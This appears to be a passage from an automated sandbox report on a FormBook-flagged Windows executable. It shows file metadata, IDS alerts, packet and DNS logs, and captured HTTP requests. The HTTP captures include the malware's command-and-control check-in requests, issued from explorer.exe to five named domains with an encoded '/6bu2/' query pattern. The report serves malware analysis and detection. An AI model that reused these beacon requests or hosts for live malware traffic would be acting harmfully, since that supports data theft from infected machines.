                                            .rsrc0xc20000x60c0x800False0.3271484375data3.42876549124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xc40000xc0x200False0.041015625data0.0776331623432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0xc20900x37cdata
                                            RT_MANIFEST0xc241c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2011
                                            Assembly Version1.0.0.0
                                            InternalNameServerObjectTerminatorSink.exe
                                            FileVersion1.0.0.0
                                            CompanyName
                                            LegalTrademarks
                                            Comments
                                            ProductNameFileReplacement
                                            ProductVersion1.0.0.0
                                            FileDescriptionFileReplacement
                                            OriginalFilenameServerObjectTerminatorSink.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/13/21-21:59:40.823686TCP1201ATTACK-RESPONSES 403 Forbidden804974534.102.136.180192.168.2.3
                                            01/13/21-22:00:22.935166TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3103.29.215.252
                                            01/13/21-22:00:22.935166TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3103.29.215.252
                                            01/13/21-22:00:22.935166TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974980192.168.2.3103.29.215.252
                                            01/13/21-22:00:43.833502TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.352.128.23.153
                                            01/13/21-22:00:43.833502TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.352.128.23.153
                                            01/13/21-22:00:43.833502TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.352.128.23.153

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:59:19.764673948 CET4974480192.168.2.3118.27.99.91
                                            Jan 13, 2021 21:59:20.062277079 CET8049744118.27.99.91192.168.2.3
                                            Jan 13, 2021 21:59:20.065541029 CET4974480192.168.2.3118.27.99.91
                                            Jan 13, 2021 21:59:20.065716028 CET4974480192.168.2.3118.27.99.91
                                            Jan 13, 2021 21:59:20.363244057 CET8049744118.27.99.91192.168.2.3
                                            Jan 13, 2021 21:59:20.363631010 CET8049744118.27.99.91192.168.2.3
                                            Jan 13, 2021 21:59:20.363652945 CET8049744118.27.99.91192.168.2.3
                                            Jan 13, 2021 21:59:20.363843918 CET4974480192.168.2.3118.27.99.91
                                            Jan 13, 2021 21:59:20.363879919 CET4974480192.168.2.3118.27.99.91
                                            Jan 13, 2021 21:59:20.661537886 CET8049744118.27.99.91192.168.2.3
                                            Jan 13, 2021 21:59:40.644495964 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:59:40.684381008 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:59:40.684509993 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:59:40.684653044 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:59:40.724306107 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:59:40.823685884 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:59:40.823740959 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 21:59:40.823908091 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:59:40.823968887 CET4974580192.168.2.334.102.136.180
                                            Jan 13, 2021 21:59:40.863786936 CET804974534.102.136.180192.168.2.3
                                            Jan 13, 2021 22:00:01.340078115 CET4974880192.168.2.369.30.217.211
                                            Jan 13, 2021 22:00:01.499378920 CET804974869.30.217.211192.168.2.3
                                            Jan 13, 2021 22:00:01.499552011 CET4974880192.168.2.369.30.217.211
                                            Jan 13, 2021 22:00:01.499761105 CET4974880192.168.2.369.30.217.211
                                            Jan 13, 2021 22:00:01.658951998 CET804974869.30.217.211192.168.2.3
                                            Jan 13, 2021 22:00:01.691947937 CET804974869.30.217.211192.168.2.3
                                            Jan 13, 2021 22:00:01.691981077 CET804974869.30.217.211192.168.2.3
                                            Jan 13, 2021 22:00:01.691993952 CET804974869.30.217.211192.168.2.3
                                            Jan 13, 2021 22:00:01.692003012 CET804974869.30.217.211192.168.2.3
                                            Jan 13, 2021 22:00:01.692167997 CET4974880192.168.2.369.30.217.211
                                            Jan 13, 2021 22:00:01.692286968 CET4974880192.168.2.369.30.217.211
                                            Jan 13, 2021 22:00:22.716034889 CET4974980192.168.2.3103.29.215.252
                                            Jan 13, 2021 22:00:22.934926987 CET8049749103.29.215.252192.168.2.3
                                            Jan 13, 2021 22:00:22.935055971 CET4974980192.168.2.3103.29.215.252
                                            Jan 13, 2021 22:00:22.935165882 CET4974980192.168.2.3103.29.215.252
                                            Jan 13, 2021 22:00:23.153749943 CET8049749103.29.215.252192.168.2.3
                                            Jan 13, 2021 22:00:23.431721926 CET4974980192.168.2.3103.29.215.252
                                            Jan 13, 2021 22:00:23.533673048 CET8049749103.29.215.252192.168.2.3
                                            Jan 13, 2021 22:00:23.533711910 CET8049749103.29.215.252192.168.2.3
                                            Jan 13, 2021 22:00:23.533765078 CET4974980192.168.2.3103.29.215.252
                                            Jan 13, 2021 22:00:23.534135103 CET4974980192.168.2.3103.29.215.252
                                            Jan 13, 2021 22:00:23.650556087 CET8049749103.29.215.252192.168.2.3
                                            Jan 13, 2021 22:00:23.652575016 CET4974980192.168.2.3103.29.215.252
                                            Jan 13, 2021 22:00:43.782654047 CET4975080192.168.2.352.128.23.153
                                            Jan 13, 2021 22:00:43.833174944 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.833359957 CET4975080192.168.2.352.128.23.153
                                            Jan 13, 2021 22:00:43.833502054 CET4975080192.168.2.352.128.23.153
                                            Jan 13, 2021 22:00:43.884052038 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884119034 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884176016 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884228945 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884279966 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884332895 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884383917 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884435892 CET4975080192.168.2.352.128.23.153
                                            Jan 13, 2021 22:00:43.884445906 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884476900 CET4975080192.168.2.352.128.23.153
                                            Jan 13, 2021 22:00:43.884536028 CET804975052.128.23.153192.168.2.3
                                            Jan 13, 2021 22:00:43.884541988 CET4975080192.168.2.352.128.23.153
                                            Jan 13, 2021 22:00:43.884649992 CET4975080192.168.2.352.128.23.153
                                            Jan 13, 2021 22:00:43.884722948 CET4975080192.168.2.352.128.23.153

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 13, 2021 21:58:04.597759008 CET5836153192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:04.654330015 CET53583618.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:26.100498915 CET6349253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:26.151179075 CET53634928.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:28.710925102 CET6083153192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:28.771922112 CET53608318.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:29.692300081 CET6010053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:29.743005991 CET53601008.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:30.852941036 CET5319553192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:30.901132107 CET53531958.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:31.654427052 CET5014153192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:31.705317020 CET53501418.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:32.730218887 CET5302353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:32.778139114 CET53530238.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:33.189100981 CET4956353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:33.247492075 CET53495638.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:33.688707113 CET5135253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:33.736644983 CET53513528.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:34.499298096 CET5934953192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:34.547305107 CET53593498.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:35.536468029 CET5708453192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:35.584412098 CET53570848.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:36.586968899 CET5882353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:36.634871006 CET53588238.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:36.673096895 CET5756853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:36.721375942 CET53575688.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:37.548713923 CET5054053192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:37.599667072 CET53505408.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:38.793415070 CET5436653192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:38.841593027 CET53543668.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:39.852374077 CET5303453192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:39.900167942 CET53530348.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:52.173333883 CET5776253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:52.231214046 CET53577628.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:54.228147030 CET5543553192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:54.276068926 CET53554358.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:54.375669003 CET5071353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:54.426413059 CET53507138.8.8.8192.168.2.3
                                            Jan 13, 2021 21:58:55.299812078 CET5613253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:58:55.371507883 CET53561328.8.8.8192.168.2.3
                                            Jan 13, 2021 21:59:05.499865055 CET5898753192.168.2.38.8.8.8
                                            Jan 13, 2021 21:59:05.556144953 CET53589878.8.8.8192.168.2.3
                                            Jan 13, 2021 21:59:13.778987885 CET5657953192.168.2.38.8.8.8
                                            Jan 13, 2021 21:59:13.839099884 CET53565798.8.8.8192.168.2.3
                                            Jan 13, 2021 21:59:16.089072943 CET6063353192.168.2.38.8.8.8
                                            Jan 13, 2021 21:59:16.153364897 CET53606338.8.8.8192.168.2.3
                                            Jan 13, 2021 21:59:19.451765060 CET6129253192.168.2.38.8.8.8
                                            Jan 13, 2021 21:59:19.759021044 CET53612928.8.8.8192.168.2.3
                                            Jan 13, 2021 21:59:40.582362890 CET6361953192.168.2.38.8.8.8
                                            Jan 13, 2021 21:59:40.643111944 CET53636198.8.8.8192.168.2.3
                                            Jan 13, 2021 21:59:41.293983936 CET6493853192.168.2.38.8.8.8
                                            Jan 13, 2021 21:59:41.342092037 CET53649388.8.8.8192.168.2.3
                                            Jan 13, 2021 21:59:43.998179913 CET6194653192.168.2.38.8.8.8
                                            Jan 13, 2021 21:59:44.067198992 CET53619468.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:01.014651060 CET6491053192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:01.338017941 CET53649108.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:22.347306967 CET5212353192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:22.714339018 CET53521238.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:43.619170904 CET5613053192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:43.780431032 CET53561308.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:52.123898029 CET5633853192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:52.180207968 CET53563388.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:52.662022114 CET5942053192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:52.718538046 CET53594208.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:53.202836037 CET5878453192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:53.259459972 CET53587848.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:53.641834021 CET6397853192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:53.689811945 CET53639788.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:54.207439899 CET6293853192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:54.258227110 CET53629388.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:54.730747938 CET5570853192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:54.787307024 CET53557088.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:55.349493027 CET5680353192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:55.406019926 CET53568038.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:56.255387068 CET5714553192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:56.303550959 CET53571458.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:56.953993082 CET5535953192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:57.018237114 CET53553598.8.8.8192.168.2.3
                                            Jan 13, 2021 22:00:57.418026924 CET5830653192.168.2.38.8.8.8
                                            Jan 13, 2021 22:00:57.465905905 CET53583068.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 13, 2021 21:59:19.451765060 CET192.168.2.38.8.8.80x92cbStandard query (0)www.o-tanemaki.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 21:59:40.582362890 CET192.168.2.38.8.8.80x4542Standard query (0)www.idahofallsobituaries.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 22:00:01.014651060 CET192.168.2.38.8.8.80x155dStandard query (0)www.bhscsh.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 22:00:22.347306967 CET192.168.2.38.8.8.80xcce9Standard query (0)www.sheilataman.comA (IP address)IN (0x0001)
                                            Jan 13, 2021 22:00:43.619170904 CET192.168.2.38.8.8.80x3fd9Standard query (0)www.ehealthla.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 13, 2021 21:59:19.759021044 CET8.8.8.8192.168.2.30x92cbNo error (0)www.o-tanemaki.com118.27.99.91A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:59:40.643111944 CET8.8.8.8192.168.2.30x4542No error (0)www.idahofallsobituaries.comidahofallsobituaries.comCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 21:59:40.643111944 CET8.8.8.8192.168.2.30x4542No error (0)idahofallsobituaries.com34.102.136.180A (IP address)IN (0x0001)
                                            Jan 13, 2021 22:00:01.338017941 CET8.8.8.8192.168.2.30x155dNo error (0)www.bhscsh.com69.30.217.211A (IP address)IN (0x0001)
                                            Jan 13, 2021 22:00:22.714339018 CET8.8.8.8192.168.2.30xcce9No error (0)www.sheilataman.comsheilataman.comCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 22:00:22.714339018 CET8.8.8.8192.168.2.30xcce9No error (0)sheilataman.com103.29.215.252A (IP address)IN (0x0001)
                                            Jan 13, 2021 22:00:43.780431032 CET8.8.8.8192.168.2.30x3fd9No error (0)www.ehealthla.com52.128.23.153A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.o-tanemaki.com
                                            • www.idahofallsobituaries.com
                                            • www.bhscsh.com
                                            • www.sheilataman.com
                                            • www.ehealthla.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.349744118.27.99.9180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:59:20.065716028 CET8831OUTGET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1
                                            Host: www.o-tanemaki.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:59:20.363631010 CET8831INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Wed, 13 Jan 2021 20:59:20 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: close
                                            Location: https://www.o-tanemaki.com/6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.34974534.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:59:40.684653044 CET8832OUTGET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1
                                            Host: www.idahofallsobituaries.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:59:40.823685884 CET8833INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 13 Jan 2021 20:59:40 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "5ffc8399-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.34974869.30.217.21180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 22:00:01.499761105 CET8854OUTGET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1
                                            Host: www.bhscsh.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 22:00:01.691947937 CET8855INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 13 Jan 2021 21:00:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Access-Control-Allow-Origin: *
                                            Data Raw: 62 64 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 09 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e ed 8e 98 ec 9d b4 ec a7 80 eb a5 bc 20 ed 91 9c ec 8b 9c ed 95 a0 20 ec 88 98 20 ec 97 86 ec 8a b5 eb 8b 88 eb 8b a4 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 65 6d 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 28 38 37 2c 20 38 37 2c 20 38 37 29 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 2c 20 22 61 72 69 61 6c 22 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 6d 61 69 6e 43 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 37 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 30 70 78 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 32 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 32 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 28 33 39 2c 20 31 32 30 2c 20 32 33 36 29 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 38 70 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 6f 74 74 6f 6d 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 65 72 72 6f 72 45 78 70 6c 61 6e 61 74 69 6f 6e 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 2c 20 22 61 72 69 61 6c 22 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 61 73 6b 53 65 63 74 69 6f 6e 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 34 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 61 73 6b 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 20 30 2c 20 30 29 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 eb a7 91 ec 9d 80 20 ea b3 a0 eb 94 95 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 76 65 72 64 61 6e 61 22 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 32 35 70 78 3b 0a 09 09 09 7d 0a 09 09 09 6c 69 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 69 61 67 6e 6f 73 65 42 75
                                            Data Ascii: bd2<!DOCTYPE HTML><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title> .</title> <style>body {margin: 0em; color: rgb(87, 87, 87); font-family: " ", "Segoe UI", "verdana", "arial"; background-repeat: repeat-x; background-color: white;}.mainContent {width: 700px; margin-top: 80px; margin-right: 120px; margin-left: 120px;}.title {color: rgb(39, 120, 236); font-family: " ", "Segoe UI", "verdana"; font-size: 38pt; font-weight: 300; margin-bottom: 20px; vertical-align: bottom; position: relative;}.errorExplanation {color: rgb(0, 0, 0); font-family: " ", "Segoe UI", "verdana", "arial"; font-size: 12pt; text-decoration: none;}.taskSection {margin-top: 20px; margin-bottom: 40px; position: relative;}.tasks {color: rgb(0, 0, 0); padding-top: 5px; font-family: " ", "Segoe UI", "verdana"; font-size: 12pt; font-weight: 200; margin-left: -25px;}li {margin-top: 8px;}.diagnoseBu


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.349749103.29.215.25280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 22:00:22.935165882 CET8858OUTGET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1
                                            Host: www.sheilataman.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 22:00:23.533673048 CET8859INHTTP/1.1 301 Moved Permanently
                                            Date: Wed, 13 Jan 2021 21:00:22 GMT
                                            Server: Apache
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            X-Redirect-By: WordPress
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Location: http://sheilataman.com/6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45
                                            Content-Length: 0
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.34975052.128.23.15380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 22:00:43.833502054 CET8860OUTGET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1
                                            Host: www.ehealthla.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 22:00:43.884119034 CET8860INHTTP/1.1 463
                                            Server: nginx
                                            Date: Wed, 13 Jan 2021 21:00:43 GMT
                                            Content-Type: text/html
                                            Content-Length: 8915
                                            Connection: close
                                            ETag: "5e52d3c2-22d3"
